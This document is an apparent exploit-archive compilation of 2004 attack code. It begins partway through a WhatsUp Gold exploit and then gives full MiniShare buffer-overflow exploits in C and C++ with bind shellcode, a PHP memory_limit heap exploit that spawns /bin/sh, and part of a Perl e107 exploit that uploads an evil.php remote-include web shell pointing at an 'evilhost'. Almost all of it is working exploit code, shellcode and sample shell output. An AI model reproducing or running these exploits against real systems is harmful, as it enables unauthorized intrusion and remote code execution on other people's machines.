$cmd .= "\xeb\x06\x90\x90"; #jumper <eb + 06> <garbage> jmp to shellcode
#$cmd .= "\xfe\x63\xa1\x71"; #winXP SP1 ws2help.dll
$cmd .= "\xc4\x2a\x02\x75"; #win2k sp0-sp4 ws2help.dll
#$cmd .= "LOWNOISE"; #garbage :D
$cmd .= "\x90"x2080;
$cmd .= $shellcode;
$cmd .= "E"x(2000-length($shellcode)); #mas basura
$cmd .= "&beepernumber=&upcode=0*&downcode=9*&trapcode=6*&end=end";
print $socket length($cmd)."\r\nPragma: no-cache\r\nAuthorization: Basic
YWRtaW46YWRtaW4=\r\n\r\n";
print $socket $cmd."\r\n";
close($socket);
exit(0);
sub usage
{
print "\n[LoWNOISE] IPSWITCH WhatsUp Gold 8.03 Remote fr33 exploit\n";
print "================================================== =\n";
print "\nUsage: NotmuchG.pl [host] [port]\n";
print "[host] Target host\n[port] WhatsUp webserver port\n\n";
print "\n Shell on tcp port 28876.\n\n";
print "ET LoWNOISE 2004\n";
exit(1);
}
# [2004-10-04]
80 MiniShare <= 1.4.1 Remote Buffer Overflow Exploit
/*
MiniShare <= 1.4.1, Remote Buffer Overflow Exploit v0.1.
Bind a shellcode to the port 101.
Full disclosure and exploit
by class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
07 november 2004
Thanx to HDMoore and Metasploit.com for their kickass ASM work.
------------------
WHAT IS MINISHARE
------------------
Homepage - http://minishare.sourceforge.net/
MiniShare is meant to serve anyone who has the need to share files to anyone,
doesn't have a place to store the files on the web,
and does not want or simply does not have the skill
and possibility to set up and maintain a complete HTTP-server software...
--------------
VULNERABILITY
--------------
A simple buffer overflow in the link length, nothing more
read the code for further instructions.
----
FIX
----
Actually none, the vendor is contacted the same day published, 1 hour before you.
As a nice **** to NGSS , iDEFENSE and all others private disclosures
homo crew ainsi que K-OTiK, ki se tap' des keu dans leur "Lab"
lol :->
----
EXTRA
----
Update the JMP ESP if you need. A wrong offset will crash minishare.
Code tested working on MiniShare 1.4.1 and WinXP SP1 English, Win2k SP4 English, WinNT SP6 English
Others MiniShare's versions aren't tested.
Tip: If it crashes for you , try to play with Sleep()...
----
BY
----
class101 [at] DFind.kd-team.com [&] #n3ws [at] EFnet
who
greets
DiabloHorn [at] www.kd-team.com [&] #kd-team [at] EFnet
*/
#include "winsock2.h"
#include "fstream.h"
#pragma comment(lib, "ws2_32")
//380 bytes, BIND shellcode port 101, XORed 0x88, thanx HDMoore.
char scode[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x 75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\x AC\x90\x03\xCD\xB4\x03\xDC\x8D"
"\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\x BA\xC1\x03\xBC\x03\x89\x66\xB9"
"\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x 89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
"\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\x D2\x94\x89\x63\x03\x8C\x03\x89"
"\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\x D6\xE2\xB8\xD1\xEC\x03\x91\x03"
"\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x 06\xC6\x86\x64\x77\x5E\x01\x4F"
"\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\x AF\x88\x88\x88\x18\x89\x88\x88"
"\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x 2C\x92\xF8\x4F\x2C\x25\xA6\x61"
"\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\x BB\xBA\x88\xD3\x05\xC3\xA8\xD9"
"\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\x D9\xDB\x77\xBC\x07\x77\xDD\x8C"
"\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\x DD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
"\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\x DB\xE0\x8A\x88\x88\xED\x01\x68"
"\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\x DB\xDC\xDF\x77\xDD\xA8\x01\x4F"
"\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\x F4\xAC\x24\xE2\x9D\xD1\x7B\x23"
"\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\x CC\xEE\x4F\xCC\xAC\xB4\x89\x89"
"\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x 05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
"\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\x FA\x76\x3B\x9E\x77\xDD\x8C\x77"
"\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\x DD\x8C\x01\x4B\xE0\x77\x77\x77"
"\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\x FB\x77\xDD\x8C\xB9\x53\xDB\x77"
"\x58\x68\x61\x63\x6B\x90";
/*
//116 bytes, execute regedit.exe, XORed 0x88, hardcoded WinXP SP1 English
char scode+[] =
"\xEB"
"\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x 75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
"\xFF\xDD\x01\x6D\x09\x64\xC4\x88\x88\x88\xDB\x05\x F5\x3C\x4E\xCD\x7C\xFA\x4E\xCD"
"\x7D\xED\x4E\xCD\x7E\xEF\x4E\xCD\x7F\xED\x4E\xCD\x 70\xEC\x4E\xCD\x71\xE1\x4E\xCD"
"\x72\xFC\x4E\xCD\x73\xA6\x4E\xCD\x74\xED\x4E\xCD\x 75\xF0\x4E\xCD\x76\xED\x4E\xCD"
"\x77\x88\xE0\x8D\x88\x88\x88\x05\xCD\x7C\xD8\x30\x E8\x75\x6E\xFF\x77\x58\xE0\x89"
"\x88\x88\x88\x30\xEB\x10\x6F\xFF\x77\x58\x68\x61\x 63\x6B\x90";
//565 bytes, execute regedit.exe, alphanumeric, hardcoded WinXP SP1 English
char scode+[]=
"LLLLYhbSgCX5bSgCHQVPPTQPPaRVVUSBRDJfh2ADTY09VQa0tk afhXMfXf1Dkbf1TkbjgY0Lkd0TkdfhH"
"CfYf1LkfjiY0Lkh0tkjjOX0Dkkf1TkljxY0Lko0Tko0TkqjfY0 Lks0tks0Tkuj1Y0Lkw0tkw0tkyCjyY0"
"Lkz0TkzCC0tkzCCjmY0Lkz0TkzCC0TkzCCjhX0Dkz0tkzCC0tk zCCjPX0Dkz0TkzCC0tkzCCjfY0Lkz0T"
"kzCjjX0DkzC0TkzCCjeX0Dkz0tkzCC0TkzCCjvX0Dkz0tkzCC0 TkzCCj3X0Dkz0tkzCC0tkzCCjOX0Dkz"
"0tkzCjaX0DkzCChuucTX1DkzCCCC0tkzCCjaY0Lkz0TkzCC0tk zCjRY0LkzCfhNUfXf1Dkzf1TkzCCCfh"
"hhfYf1Lkzf1TkzCCChS4ciX1DkzCCCC0TkzCC0tkzCjKY0Lkz0 TkzCCfhzhfXf1Dkzf1TkzUvB3tLHCiS"
"r2K9Esr9Ele9E8g9Eqe9Ejd9Eni9EUt9EbD9Efe9Etx9E2e9EO ahpucTrEjPG2LLwhGhR4ciGcgSwzG";
*/
static char payload[5000];
char espxp1en[]="\x33\x55\xdc\x77"; //JMP ESP - user32.dll - WinXP SP1 English
char esp2k4en[]="\xb8\x9e\xe3\x77"; //JMP ESP - user32.dll - Win2k SP4 English
char espnt6en[]="\xf8\x29\xf3\x77"; //JMP ESP - kernel32.dll - WinNT SP6 English
void usage(char* us);
WSADATA wsadata;
void ver();
int main(int argc,char *argv[])
{
ver();
if ((argc<3)||(argc>4)||(atoi(argv[1])<1)||(atoi(argv[1])>2)){usage(argv[0]);return -1;}
if (WSAStartup(MAKEWORD(2,0),&wsadata)!=0){cout<<"[+] wsastartup error: "<<WSAGetLastError()<<endl;return -1;}
int ip=htonl(inet_addr(argv[2])), sz, port, sizeA, sizeB, sizeC, a, b, c;
char *target, *os;
if (argc==4){port=atoi(argv[3]);}
else port=80;
if (atoi(argv[1]) == 1){target=espxp1en;os="WinXP SP1 English";}
if (atoi(argv[1]) == 2){target=esp2k4en;os="Win2k SP4 English";}
if (atoi(argv[1]) == 3){target=espnt6en;os="WinNT SP6 English";}
SOCKET s;
struct fd_set mask;
struct timeval timeout;
struct sockaddr_in server;
s=socket(AF_INET,SOCK_STREAM,0);
if (s==INVALID_SOCKET){ cout<<"[+] socket() error: "<<WSAGetLastError()<<endl;WSACleanup();return -1;}
cout<<"[+] target: "<<os<<endl;
server.sin_family=AF_INET;
server.sin_addr.s_addr=htonl(ip);
server.sin_port=htons(port);
WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);
switch(select(s+1,NULL,&mask,NULL,&timeout))
{
case -1: {cout<<"[+] select() error: "<<WSAGetLastError()<<endl;closesocket(s);return -1;}
case 0: {cout<<"[+] connection failed."<<endl;closesocket(s);return -1;}
default:
if(FD_ISSET(s,&mask))
{
cout<<"[+] connected, constructing the payload..."<<endl;
Sleep(1000);
sizeA=1787;
sizeB=414-sizeof(scode);
sizeC=10;
sz=sizeA+sizeB+sizeC+sizeof(scode)+17;
memset(payload,0,sizeof(payload));
strcat(payload,"GET ");
for (a=0;a<sizeA;a++){strcat(payload,"\x41");}
strcat(payload,target);
for (b=0;b<sizeB;b++){strcat(payload,"\x41");}
strcat(payload,scode);
for (c=0;c<sizeC;c++){strcat(payload,"\x41");}
strcat(payload," HTTP/1.1\r\n\r\n");
Sleep(1000);
if (send(s,payload,strlen(payload),0)==SOCKET_ERROR) { cout<<"[+] sending error, the server prolly rebooted."<<endl;return -1;}
Sleep(1000);
cout<<"[+] size of payload: "<<sz<<endl;
cout<<"[+] payload send, connect the port 101 to get a shell."<<endl;
return 0;
}
}
closesocket(s);
WSACleanup();
return 0;
}
void usage(char* us)
{
cout<<"USAGE: 101_mini.exe Target Ip Port\n"<<endl;
cout<<"TARGETS: "<<endl;
cout<<" [+] 1. WinXP SP1 English (*)"<<endl;
cout<<" [+] 2. Win2k SP4 English (*)"<<endl;
cout<<" [+] 3. WinNT SP6 English (*)"<<endl;
cout<<"NOTE: "<<endl;
cout<<" The port 80 is default if no port specified"<<endl;
cout<<" The exploit bind a shellcode to the port 101"<<endl;
cout<<" A wildcard (*) mean Tested."<<endl;
return;
}
void ver()
{
cout<<endl;
cout<<" "<<endl;
cout<<" ================================================== =[v0.1]===="<<endl;
cout<<" ====MiniShare, Minimal HTTP Server for Windows <= v1.4.1====="<<endl;
cout<<" =============Remote Buffer Overflow Exploit=================="<<endl;
cout<<" ====coded by class101===========[DFind.kd-team.com 2004]====="<<endl;
cout<<" ================================================== ==========="<<endl;
cout<<" "<<endl;
}
// [2004-11-07]
80 MiniShare Remote Buffer Overflow Exploit (c source)
/*
no@0x00:~/Exploits/minishare$ ./mini-exploit 10.20.30.2
***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***
[x] Connected to: 10.20.30.2 on port 80.
[x] Sending bad code..done.
[x] Trying to connect to: 10.20.30.2 on port 4444..
[x] 0wn3d!
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
E:\Program Files\MiniShare>
Greetz to NtWaK0,kane,kamalo,foufz, and schap :)
http://NoPh0BiA.lostspirits.org
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>
#include <netinet/in.h>
#include <fcntl.h>
#define PORT 80
#define PORT1 4444
#define RET "\xB8\x9E\xE3\x77" /*2k sp2*/
char shellcode[]=
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\x34\x0a"
"\x2f\xfd\x83\xeb\xfc\xe2\xf4\xc8\xe2\x79\xfd\x34\x 0a\x7c\xa8\x62"
"\x5d\xa4\x91\x10\x12\xa4\xb8\x08\x81\x7b\xf8\x4c\x 0b\xc5\x76\x7e"
"\x12\xa4\xa7\x14\x0b\xc4\x1e\x06\x43\xa4\xc9\xbf\x 0b\xc1\xcc\xcb"
"\xf6\x1e\x3d\x98\x32\xcf\x89\x33\xcb\xe0\xf0\x35\x cd\xc4\x0f\x0f"
"\x76\x0b\xe9\x41\xeb\xa4\xa7\x10\x0b\xc4\x9b\xbf\x 06\x64\x76\x6e"
"\x16\x2e\x16\xbf\x0e\xa4\xfc\xdc\xe1\x2d\xcc\xf4\x 55\x71\xa0\x6f"
"\xc8\x27\xfd\x6a\x60\x1f\xa4\x50\x81\x36\x76\x6f\x 06\xa4\xa6\x28"
"\x81\x34\x76\x6f\x02\x7c\x95\xba\x44\x21\x11\xcb\x dc\xa6\x3a\xb5"
"\xe6\x2f\xfc\x34\x0a\x78\xab\x67\x83\xca\x15\x13\x 0a\x2f\xfd\xa4"
"\x0b\x2f\xfd\x82\x13\x37\x1a\x90\x13\x5f\x14\xd1\x 43\xa9\xb4\x90"
"\x10\x5f\x3a\x90\xa7\x01\x14\xed\x03\xda\x50\xff\x e7\xd3\xc6\x63"
"\x59\x1d\xa2\x07\x38\x2f\xa6\xb9\x41\x0f\xac\xcb\x dd\xa6\x22\xbd"
"\xc9\xa2\x88\x20\x60\x28\xa4\x65\x59\xd0\xc9\xbb\x f5\x7a\xf9\x6d"
"\x83\x2b\x73\xd6\xf8\x04\xda\x60\xf5\x18\x02\x61\x 3a\x1e\x3d\x64"
"\x5a\x7f\xad\x74\x5a\x6f\xad\xcb\x5f\x03\x74\xf3\x 3b\xf4\xae\x67"
"\x62\x2d\xfd\x25\x56\xa6\x1d\x5e\x1a\x7f\xaa\xcb\x 5f\x0b\xae\x63"
"\xf5\x7a\xd5\x67\x5e\x78\x02\x61\x2a\xa6\x3a\x5c\x 49\x62\xb9\x34"
"\x83\xcc\x7a\xce\x3b\xef\x70\x48\x2e\x83\x97\x21\x 53\xdc\x56\xb3"
"\xf0\xac\x11\x60\xcc\x6b\xd9\x24\x4e\x49\x3a\x70\x 2e\x13\xfc\x35"
"\x83\x53\xd9\x7c\x83\x53\xd9\x78\x83\x53\xd9\x64\x 87\x6b\xd9\x24"
"\x5e\x7f\xac\x65\x5b\x6e\xac\x7d\x5b\x7e\xae\x65\x f5\x5a\xfd\x5c"
"\x78\xd1\x4e\x22\xf5\x7a\xf9\xcb\xda\xa6\x1b\xcb\x 7f\x2f\x95\x99"
"\xd3\x2a\x33\xcb\x5f\x2b\x74\xf7\x60\xd0\x02\x02\x f5\xfc\x02\x41"
"\x0a\x47\x0d\xbe\x0e\x70\x02\x61\x0e\x1e\x26\x67\x f5\xff\xfd";
struct sockaddr_in hrm;
void shell(int sock)
{
fd_set fd_read;
char buff[1024];
int n;
while(1) {
FD_SET(sock,&fd_read);
FD_SET(0,&fd_read);
if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
if( FD_ISSET(sock, &fd_read) ) {
n=read(sock,buff,sizeof(buff));
if (n == 0) {
printf ("Connection closed.\n");
exit(EXIT_FAILURE);
} else if (n < 0) {
perror("read remote");
exit(EXIT_FAILURE);
}
write(1,buff,n);
}
if ( FD_ISSET(0, &fd_read) ) {
if((n=read(0,buff,sizeof(buff)))<=0){
perror ("read user");
exit(EXIT_FAILURE);
}
write(sock,buff,n);
}
}
close(sock);
}
int conn(char *ip, int p)
{
int sockfd;
hrm.sin_family = AF_INET;
hrm.sin_port = htons(p);
hrm.sin_addr.s_addr = inet_addr(ip);
bzero(&(hrm.sin_zero),8);
sockfd=socket(AF_INET,SOCK_STREAM,0);
if((connect(sockfd,(struct sockaddr*)&hrm,sizeof(struct sockaddr))) < 0 )
{
perror("connect");
exit(0);
}
return sockfd;
}
int main(int argc, char *argv[])
{
if(argc < 2)
{
printf("Usage: TARGET.\n");
exit(0);
}
char *buffer = malloc(2220),*B=malloc(30),*target=argv[1];
int x,y;
printf("\n***MiniShare remote buffer overflow UNIX exploit by NoPh0BiA.***\n\n");
memset(buffer,'\0',2220);
memset(B,0x42,30);
memset(buffer,0x41,1787);
strcat(buffer,RET);
strcat(buffer,B);
strcat(buffer,shellcode);
if((x = conn(target,PORT)))
printf("[x] Connected to: %s on port %d.\n",target,PORT);
sleep(3);
printf("[x] Sending bad code..");
write(x,"GET ",4);
write(x,buffer,2220);
write(x," HTTP/1.1\r\n\r\n",13);
sleep(3);
printf("done.\n");
printf("[x] Trying to connect to: %s on port %d..\n",target,PORT1);
if((y=conn(target,PORT1)))
{
printf("[x] 0wn3d!\n\n");
shell(y);
}
}
// [2004-11-16]
80 PHP <= 4.3.7/ 5.0.0RC3 memory_limit Remote Exploit
/* Remote exploit for the php memory_limit vulnerability found by Stefan
* Esser in php 4 (<= 4.3.7) and php 5 (<= 5.0.0RC3).
*
* by Gyan Chawdhary ([email protected])
* (felinemenace.org/~gyan)
*
* Greets
* S.Esser for the vuln and mlxdebug.tgz, everything in the code is based on it.
* scrippie, gera, riq, jaguar, girish, n2n ...
*
* Vulnerability:
* The issue is well documented in the advisory.
*
* Exploitation:
* I cud not find a generic way to free a 40 byte chunk which could be later
* used by ALLOC_HASHTABLE. The exploit will construct a fake zend hash table
* which will be sent in the first request. The second request will kick in the
* memory interuption after allocating space for the hashtable and before it is
* initalized. The memory it will use for this allocation will contain the data
* from our previous request which includes the pDestructor pointer pointing to
* our nop+shellcode which is a part of the second request. This happens in the
* zend_hash_destory function.
*
* PS - The exploit is ugly, coded to test the vuln. If anyone knows the trick
* for 40 byte free() then plz drop me a mail. Tested on RH 8 php 4.3.7,
* Apache 2.0.49 with register_globals = On
*
* Gyan
*
*
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#define IP "127.0.0.1"
#define PORT 80
int sock;
struct sockaddr_in s;
char request1[]=
"POST /info.php?a[1]=test HTTP/1.0"
"Host: doesnotreallymatter\r\n"
"User-Agent: mlxdebug\r\n"
"Accept: text/html\r\n"
"Connection: close\r\n"
"Pragma: no-cache\r\n"
"Cache-Control: no-cache\r\n"
"Content-Type: multipart/form-data; boundary=------------ \r\n BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB \r\n";
char request2[]=
"---------------264122487026375\r\n"
"Content-Length: 472\r\n"
"\r\n"
"-----------------------------264122487026375\r\n"
"Content-Disposition: form-data; name=\"a[][]\"\r\n"
"\r\n"
"TESTTESTTESTTESTTESTTESTTESTTESTTESTTES \r\n"
"\r\n"
"-----------------------------264122487026375--\r\n";
char request3[]=
"POST /info.php?a[1]=test HTTP/1.0"
"Host: doesnotreallymatter\r\n"
"User-Agent: mlxdebug\r\n"
"Accept: text/html\r\n"
"Connection: close\r\n"
"Pragma: no-cache\r\n"
"Cache-Control: no-cache\r\n"
"Content-Type: multipart/form-data; boundary=-------------";
char request4[]=
"---------------264122487026375\r\n"
"Content-Length: 472\r\n"
"\r\n"
"-----------------------------264122487026375\r\n"
"Content-Disposition: form-data; name=\"a[][]\"\r\n"
"\r\n"
"TESTTESTTESTTESTTESTTESTTESTTESTTESTTES \r\n"
"-----------------------------264122487026375--\r\n";
/*Ripped shellcode. Runs on port 36864*/
char shell[]=
"\xeb\x72\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x 46\x0c"
"\x40\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\x43\x c6\x46"
"\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\x c2\x89"
"\x46\x18\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x 4e\x0c"
"\x8d\x4e\x08\xb0\x66\xcd\x80\x89\x5e\x0c\x43\x43\x b0\x66"
"\xcd\x80\x89\x56\x0c\x89\x56\x10\xb0\x66\x43\xcd\x 80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0\x3f\x41\xcd\x80\x b0\x3f"
"\x41\xcd\x80\x88\x56\x07\x89\x76\x0c\x87\xf3\x8d\x 4b\x0c"
"\xb0\x0b\xcd\x80\xe8\x89\xff\xff\xff/bin/sh";
void xp_connect(char *ip)
{
char buffer[1024];
char temp[1024];
int tmp;
s.sin_family = AF_INET;
s.sin_port = htons(PORT);
s.sin_addr.s_addr = inet_addr(ip);
if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
{
printf("Cannot create socket\n");
exit(-1);
}
if((connect(sock,(struct sockaddr *)&s,sizeof(struct sockaddr))) < 0)
{
printf("Cannot connect()\n");
exit(-1);
}
}
void xp_write(char *data)
{
if(write (sock, data, strlen(data)) < 0)
{
printf("write() failed\n");
exit(-1);
}
}
void xp_receive()
{
int tmp;
char buffer[1024*2];
if ( (tmp = read(sock, buffer, sizeof(buffer))) <= 0)
{
printf("read() failed\n");
exit(-1);
}
}
char fill[] = " \r\n %s \r\n ";
/*This function builds the main request. In destroy_uploaded_files_hash we
* need to pass zend_hash_apply to reach zend_hash_destroy.
* We set
* 1) ht->nApplyCount to 0x02020202 to pass HASH_PROTECT_RECURSION
* 2) p->pListNext = 0x00000000 to exit out of zend_hash_apply
* 3) ht->pDestructor = addr to nop+shellcode
* 0x402c22bc <zend_hash_destroy+184>: sub $0xc,%esp
* 0x402c22bf <zend_hash_destroy+187>: pushl 0x8(%esi)
* 0x402c22c2 <zend_hash_destroy+190>: call *%eax
* 0x402c22c4 <zend_hash_destroy+192>: add $0x10,%esp
*
* $eax = ht->pDestructor
*/
void build1(int size, int count)
{
char *p1, *p2;
char *b1, *b2;
int i;
int pot = 0xffffffff;
int got = 0x41414141;
int bot = 0x0818ef29; //0x0818ef78;//0x08189870; //0x402b6c08;
int sot = 0x02020202;
int ret = 0x081887a8;
b1 = (char *)malloc(size-8);
p1 = b1;
for (i=0; i<size-8; i+=36)
{
*( (int **)p1 ) = (int *)( pot );
p1+=4;
*( (int **)p1 ) = (int *)( got );
p1+=4;
*( (int **)p1 ) = (int *)( bot );
p1+=4;
*( (int **)p1 ) = (int *)( ret );
p1+=4;
*( (int **)p1 ) = (int *)( bot );
p1+=4;
*( (int **)p1 ) = (int *)( got );
p1+=4;
*( (int **)p1 ) = (int *)( bot );
p1+=4;
*( (int **)p1 ) = (int *)( sot );
p1+=4;
}
b2 = (char *)malloc(size+1);
p2 = b2;
sprintf(p2, fill, b1);
for(i=0; i<count; i++)
xp_write(b2);
}
/*Test function for resetting php memory , does not work properly with
* php_normalize_heap function */
void build2(int size, int count)
{
char *p1, *p2;
char *b1, *b2;
int i;
b1 = (char *)malloc(size-8);
p1 = b1;
memset(p1, '\x42', size-8);
b2 = (char *)malloc(size+1);
p2 = b2;
sprintf(p2, fill, b1);
for(i=0; i<count; i++)
xp_write(b2);
}
/*TODO*/
char *php_normalize_heap()
{
return;
}
/*Builds our shellcode with NOP's and the mem interuption request*/
void build3(int size, int count)
{
char *p1, *p2;
char *b1, *b2;
int i;
int pot = 0x90909090;
b1 = (char *)malloc(size-8);
p1 = b1;
for (i=0; i<size-8-strlen(shell); i+=4) {
*( (int **)p1 ) = (int *)( pot );
p1+=4;
}
p1 = b1;
p1+= size - 8 - strlen(shell);
strncpy(p1, shell, strlen(shell));
b2 = (char *)malloc(size+1);
p2 = b2;
sprintf(p2, fill, b1);
for(i=0; i<count; i++)
xp_write(b2);
}
void exploit()
{
int i;
printf("Stage 1: Filling mem with bad pdestructor ... ");
for (i=0; i< 5; i++)
{
xp_connect(IP);
xp_write(request1);
build1(5000, 1);
xp_write(request2);
close(sock);
}
printf("DONE\r\n");
printf("Stage 2: Triggering memory_limit now ... ");
xp_connect(IP);
xp_write(request3);
build3(8192, 255);
build3(7265, 1);
xp_write(request4);
printf("DONE\r\n");
printf("Shell on port 36864\r\n");
}
main()
{
/*No args, no vectors*/
exploit();
}
/*
* Using [][][][] arry its possible to exhaust mem for 1.3.* servers and
*trigger memlimit in _zval_copy_ctor after ALLOC_HASHTABLE
*
*
[root@localhost stuff]# ./cool
Stage 1: Filling mem with bad pdestructor ... DONE
Stage 2: Triggering mem_limit now ... DONE
Shell on port 36864
[root@localhost stuff]# telnet 127.0.0.1 36864
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
id;
uid=99(nobody) gid=4294967295 groups=4294967295
uname -a;
Linux localhost.localdomain 2.4.18-14 #1 Wed Sep 4 13:35:50 EDT 2002 i686 i686 i386 GNU/Linux
*/
// [2004-11-27]
80 e107 include() Remote Exploit
################################################## ##################
#
# _____ _
# | ___| | _____ ___
# | |_ | |/ _ \ \ /\ / /
# | _| | | (_) \ V V /
# |_| |_|\___/ \_/\_/
# Security Group.
#
# -=[ e107 remote sploit ]=-
# by sysbug
#
# Attack method:
# with this sploit u can send an include() vuln to a Host victim
# the upload go to /images/evil.php
#
# C:\Perl\bin>perl sploit.pl www.site.com
# -=[ e107 remote sploit ]=-
# by sysbug
# # www.site.com
# # OWNED OH YEAH!
# # get your evilc0de in:
# # www.site.com/images/evil.php?owned=http://evilhost/
# C:\Perl\bin>
#
# credits: ALL MY FRIENDS!
# HELP ? RTFM -> perl sploit.pl
################################################## ###################
use IO::Socket;
if(@ARGV < 1){
usage();
exit;
}
main();
sub main(){
print "-=[ e107 remote sploit ]=-\n";
print " by sysbug \n\n";
$host[0] = $ARGV[0];
if($host[0] =~ /\//){
($host[1],$host[2])=split(/\//,$host[0]);
$host[0] =~ /\/(.*)/;
$host[3] = "/";
$host[3] .= $1;
}
$host[1] = $host[0] if(!$host[1]);
@handlers =("e107_handlers","handlers");
print "# $host[1]\n";
foreach $handler(@handlers){
$path = "$host[3]/$handler/htmlarea/popups/ImageManager/images.php";
$socket=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host[1],PeerPort=>80,Timeout=>10)|| die " s0k off\n";
print $socket "POST $path HTTP/1.1\r\n";
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
print $socket "Referer: http://www.lapropinacultural.com.ar/handlers/htmlarea/popups/insert_image.php\r\n";
print $socket "Accept-Language: pt\r\n";
print $socket "Content-Type: multipart/form-data; boundary=---------------------------7d410e113f8\r\n";
print $socket "Accept-Encoding: gzip, deflate\r\n";
print $socket "User-Agent: l33t br0ws3r\r\n";
print $socket "Host: $host[1]\r\n";
print $socket "Content-Length: 1646\r\n";
print $socket "Connection: Keep-Alive\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"dirPath\"\r\n\r\n";
print $socket "/\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"url\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"width\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"vert\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"alt\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"height\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"horiz\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"upload\"; filename=\"evil.php\"\r\n";
print $socket "Content-Type: application/octet-stream\r\n\r\n";
print $socket "<? include(\$owned); ?>\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"align\"\r\n\r\n";
print $socket "baseline\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"border\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"orginal_width\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"orginal_height\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"constrain_prop\"\r\n\r\n";
print $socket "on\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n";
print $socket "Refresh\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n";
print $socket "OK\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"cancel\"\r\n\r\n";
print $socket "Cancel\r\n";
print $socket "-----------------------------7d410e113f8--\r\n\r\n\r\n\r\n";
@socket = <$socket>;
foreach $teste(@socket){
if($teste=~ /<title>Image Browser<\/title>/){
print "# OWNED OH YEAH!\n";
print "# get your evilc0de in: \n# $host[0]/images/evil.php?owned=http://evilhost/\n";
$result = 1;
}
}
close($socket);
}
if($result){
exit;
}
print "# b4d upload!!";
}
sub usage(){
